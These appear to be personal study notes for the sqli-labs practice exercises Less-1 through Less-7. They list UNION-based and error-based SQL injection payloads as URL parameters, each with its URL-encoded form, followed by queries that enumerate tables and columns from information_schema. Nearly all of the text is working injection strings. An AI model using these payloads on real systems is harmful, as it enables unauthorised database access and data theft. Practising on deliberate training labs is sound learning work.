Less-1:
?id=-1' union all select 1,2,3 --+
// 转译
?id=-1%27%20union%20all%20select%201,2,3%20--+
Less-2:
?id=-1 union all select 1,2,3
// 转译
?id=-1%20union%20all%20select%201,2,3
Less-3:
?id=-1') union all select 1,2,3
// 转译
?id=-1%27)%20union%20all%20select%201,2,3%20--+
Less-4:
?id=-1") union all select 1,2,3
// 转译
?id=-1")%20union%20all%20select%201,2,3%20--+
Less-5:
?id=1'%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+
// 转译
?id=1%27%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+
Less-6:
?id=1"%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+
// 转译
?id=1"%20union%20all%20select%201,2,(select%201%20from%20(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--+
Less-7:
不太会
最后插入的SQL语句:
select table_name from information_schema.tables where table_schema='数据库名' limit ?,1;
select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit ?,1;
select 列名,列名 from 表名;